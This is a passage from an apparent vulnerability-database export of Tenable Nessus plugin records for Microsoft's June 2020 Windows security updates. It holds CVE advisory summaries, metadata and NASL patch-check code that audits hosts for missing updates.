cumulative update 4561670. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the wlansvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2020-1281)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this vulnerability could run arbitrary code in a privileged process. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-1272)\n\n - A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. (CVE-2020-1300)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230, CVE-2020-1260)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1315)\n\n - A denial of service vulnerability exists when Windows Registry improperly handles filesystem operations. An attacker who successfully exploited the vulnerability could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1287)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1246, CVE-2020-1262)\n\n - An elevation of privilege vulnerability exists when an OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists when Windows Modules Installer Service improperly handles class object members. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. The update addresses the vulnerability by correcting how Windows handles calls to preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251, CVE-2020-1253)", "cvss3": {}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "KB4561645: Windows Server 2008 June 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1160", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1230", "CVE-2020-1236", "CVE-2020-1239", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1260", "CVE-2020-1262", "CVE-2020-1270", "CVE-2020-1272", "CVE-2020-1281", "CVE-2020-1287", "CVE-2020-1291", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1317", "CVE-2020-1348"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JUN_4561670.NASL", "href": "https://www.tenable.com/plugins/nessus/137263", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137263);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-1160\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1230\",\n \"CVE-2020-1236\",\n \"CVE-2020-1239\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1260\",\n \"CVE-2020-1262\",\n \"CVE-2020-1270\",\n \"CVE-2020-1272\",\n \"CVE-2020-1281\",\n \"CVE-2020-1287\",\n \"CVE-2020-1291\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1317\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561645\");\n script_xref(name:\"MSKB\", value:\"4561670\");\n script_xref(name:\"MSFT\", value:\"MS20-4561645\");\n script_xref(name:\"MSFT\", value:\"MS20-4561670\");\n script_xref(name:\"IAVA\", value:\"2020-A-0248-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0051\");\n\n script_name(english:\"KB4561645: Windows Server 2008 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561645\nor cumulative update 4561670. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1246, CVE-2020-1262)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253)\");\n # https://support.microsoft.com/en-us/help/4561645/windows-server-2008-update-kb4561645\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2ba639f1\");\n # https://support.microsoft.com/en-us/help/4561670/windows-server-2008-update-kb4561670\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?79b91630\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4561645 or Cumulative Update KB4561670.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1236\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1317\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561670',\n '4561645'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0', \n sp:2,\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561670, 4561645])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:02:28", "description": "The remote Windows host is missing security update 4561669 or cumulative update 4561643. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the wlansvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2020-1281)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this vulnerability could run arbitrary code in a privileged process. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1299)\n\n - A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. (CVE-2020-1300)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230, CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory. The vulnerability could corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows Registry improperly handles filesystem operations. An attacker who successfully exploited the vulnerability could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - An information disclosure vulnerability exists in the way Windows Error Reporting (WER) handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1263)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1287)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1246, CVE-2020-1262)\n\n - An elevation of privilege vulnerability exists when an OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists when Windows Modules Installer Service improperly handles class object members. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. The update addresses the vulnerability by correcting how Windows handles calls to preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when Component Object Model (COM) client uses special case IIDs. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1311)\n\n - A spoofing vulnerability exists when theMicrosoft Edge (Chromium-based) in IE Mode improperly handles specific redirects. An attacker who successfully exploits the IE Mode vulnerability could trick a user into believing that the user was on a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. (CVE-2020-1220)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251, CVE-2020-1253)", "cvss3": {}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "KB4561669: Windows 7 and Windows Server 2008 R2 June 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1160", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1219", "CVE-2020-1220", "CVE-2020-1230", "CVE-2020-1236", "CVE-2020-1239", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1260", "CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1270", "CVE-2020-1271", "CVE-2020-1272", "CVE-2020-1281", "CVE-2020-1287", "CVE-2020-1291", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1311", "CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1317", "CVE-2020-1348"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561643.NASL", "href": "https://www.tenable.com/plugins/nessus/137260", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137260);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-1160\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1230\",\n \"CVE-2020-1236\",\n \"CVE-2020-1239\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1260\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1281\",\n \"CVE-2020-1287\",\n \"CVE-2020-1291\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1311\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1317\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561669\");\n script_xref(name:\"MSKB\", value:\"4561643\");\n script_xref(name:\"MSFT\", value:\"MS20-4561669\");\n script_xref(name:\"MSFT\", value:\"MS20-4561643\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0248-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0051\");\n\n script_name(english:\"KB4561669: Windows 7 and Windows Server 2008 R2 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561669\nor cumulative update 4561643. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. 